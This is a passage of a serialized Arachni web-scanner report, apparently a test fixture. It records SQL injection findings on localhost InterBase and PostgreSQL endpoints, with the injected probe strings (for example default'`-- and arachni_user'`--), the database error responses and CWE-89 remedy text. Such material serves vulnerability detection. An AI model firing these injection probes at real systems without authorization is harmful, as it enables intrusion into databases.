:combo:
!binary "aW5wdXQ=": default'`--
:action: http://localhost:7362/interbase/link/append?input=default
:verification:
:id: Unexpected end of command in statement
var: input
url: http://localhost:7362/interbase/link/append?input=default
injected: default'`--
id: Unexpected end of command in statement
regexp: (?i-mx:Unexpected end of command in statement)
regexp_match: Unexpected end of command in statement
elem: link
remarks: {}
method: GET
response: ! 'Warning: ibase_
Unexpected end of command in statement
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NjI=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjo0NiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: cookie2
url: http://localhost:7362/interbase/cookie/append
elem: cookie
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:Unexpected end of command in statement)
:match: Unexpected end of command in statement
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: )
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2llMg==": cookie value)
:injected: cookie value)
:combo:
!binary "Y29va2llMg==": cookie value)
:action: http://localhost:7362/interbase/cookie/append
:verification:
:id: Unexpected end of command in statement
var: cookie2
url: http://localhost:7362/interbase/cookie/append
injected: cookie value)
id: Unexpected end of command in statement
regexp: (?i-mx:Unexpected end of command in statement)
regexp_match: Unexpected end of command in statement
elem: cookie
remarks: {}
method: GET
response: ! 'Warning: ibase_
Unexpected end of command in statement
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value)
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NjI=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjo0OCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/interbase/cookie/flip
elem: cookie
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:Unexpected end of command in statement)
:match: Unexpected end of command in statement
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: )
:altered: Parameter flip
:element: cookie
:params: {}
:follow_location: true
:cookies:
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:injected: ''
:combo:
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/interbase/cookie/flip
:verification:
:id: Unexpected end of command in statement
var: Parameter flip
url: http://localhost:7362/interbase/cookie/flip
injected: ''
id: Unexpected end of command in statement
regexp: (?i-mx:Unexpected end of command in statement)
regexp_match: Unexpected end of command in statement
elem: cookie
remarks: {}
method: GET
response: ! '[nil, "Warning: ibase_\nUnexpected end of command in statement\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;)=95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NzM=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjo0OSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: User-Agent
url: http://localhost:7362/interbase/header/append
elem: header
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:Unexpected end of command in statement)
:match: Unexpected end of command in statement
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: arachni_user'`--
:injected: arachni_user'`--
:combo:
User-Agent: arachni_user'`--
:action: http://localhost:7362/interbase/header/append
:verification:
:id: Unexpected end of command in statement
var: User-Agent
url: http://localhost:7362/interbase/header/append
injected: arachni_user'`--
id: Unexpected end of command in statement
regexp: (?i-mx:Unexpected end of command in statement)
regexp_match: Unexpected end of command in statement
elem: header
remarks: {}
method: GET
response: ! 'Warning: ibase_
Unexpected end of command in statement
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: arachni_user'`--
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NjI=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjo1NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/interbase/header/flip
elem: header
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:Unexpected end of command in statement)
:match: Unexpected end of command in statement
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: Parameter flip
:element: header
:params:
:follow_location: true
:headers:
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:injected: ''
:combo:
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/interbase/header/flip
:verification:
:id: Unexpected end of command in statement
var: Parameter flip
url: http://localhost:7362/interbase/header/flip
injected: ''
id: Unexpected end of command in statement
regexp: (?i-mx:Unexpected end of command in statement)
regexp_match: Unexpected end of command in statement
elem: header
remarks:
:stuff:
- Blah
- Blah2
method: GET
response: ! '[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil,
nil, nil, nil, "Warning: ibase_\nUnexpected end of command in statement\n",
nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
! '''`--': 95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjE4
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzowMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: input
url: http://localhost:7362/postgresql/form/append
elem: form
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:PostgreSQL query failed:)
:match: ! 'PostgreSQL query failed:'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: )
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": default)
:follow_location: true
:injected: default)
:combo:
!binary "aW5wdXQ=": default)
:action: http://localhost:7362/postgresql/form/append
:verification:
:id: ! 'PostgreSQL query failed:'
var: input
url: http://localhost:7362/postgresql/form/append
injected: default)
id: ! 'PostgreSQL query failed:'
regexp: (?i-mx:PostgreSQL query failed:)
regexp_match: ! 'PostgreSQL query failed:'
elem: form
remarks: {}
method: GET
response: ! 'PostgreSQL query failed:
supplied argument is not a valid PostgreSQL result
pg_query() [:
pg_exec() [:
PostgreSQL.*ERROR
Warning stuff pg_ stuff
valid PostgreSQL result
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTY5
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzowOCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/postgresql/form/flip
elem: form
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:PostgreSQL query failed:)
:match: ! 'PostgreSQL query failed:'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: Parameter flip
:element: form
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:follow_location: true
:injected: ''
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/postgresql/form/flip
:verification:
:id: ! 'PostgreSQL query failed:'
var: Parameter flip
url: http://localhost:7362/postgresql/form/flip
injected: ''
id: ! 'PostgreSQL query failed:'
regexp: (?i-mx:PostgreSQL query failed:)
regexp_match: ! 'PostgreSQL query failed:'
elem: form
remarks: {}
method: GET
response: ! '["PostgreSQL query failed:\nsupplied argument is not a valid PostgreSQL
result\npg_query() [:\npg_exec() [:\nPostgreSQL.*ERROR\nWarning stuff pg_ stuff\nvalid
PostgreSQL result\n", nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg1
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzowOCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: input
url: http://localhost:7362/postgresql/link/append?input=default
elem: link
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:PostgreSQL query failed:)
:match: ! 'PostgreSQL query failed:'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": default'`--
:follow_location: true
:injected: default'`--
:combo:
!binary "aW5wdXQ=": default'`--
:action: http://localhost:7362/postgresql/link/append?input=default
:verification:
:id: ! 'PostgreSQL query failed:'
var: input
url: http://localhost:7362/postgresql/link/append?input=default
injected: default'`--
id: ! 'PostgreSQL query failed:'
regexp: (?i-mx:PostgreSQL query failed:)
regexp_match: ! 'PostgreSQL query failed:'
elem: link
remarks: {}
method: GET
response: ! 'PostgreSQL query failed:
supplied argument is not a valid PostgreSQL result
pg_query() [:
pg_exec() [:
PostgreSQL.*ERROR
Warning stuff pg_ stuff
valid PostgreSQL result
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTY5
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzoxMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: true
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/postgresql/link/flip?input=default
elem: link
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:PostgreSQL query failed:)
:match: ! 'PostgreSQL query failed:'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: )
:altered: Parameter flip
:element: link
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:follow_location: true
:injected: ''
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
): !binary |-
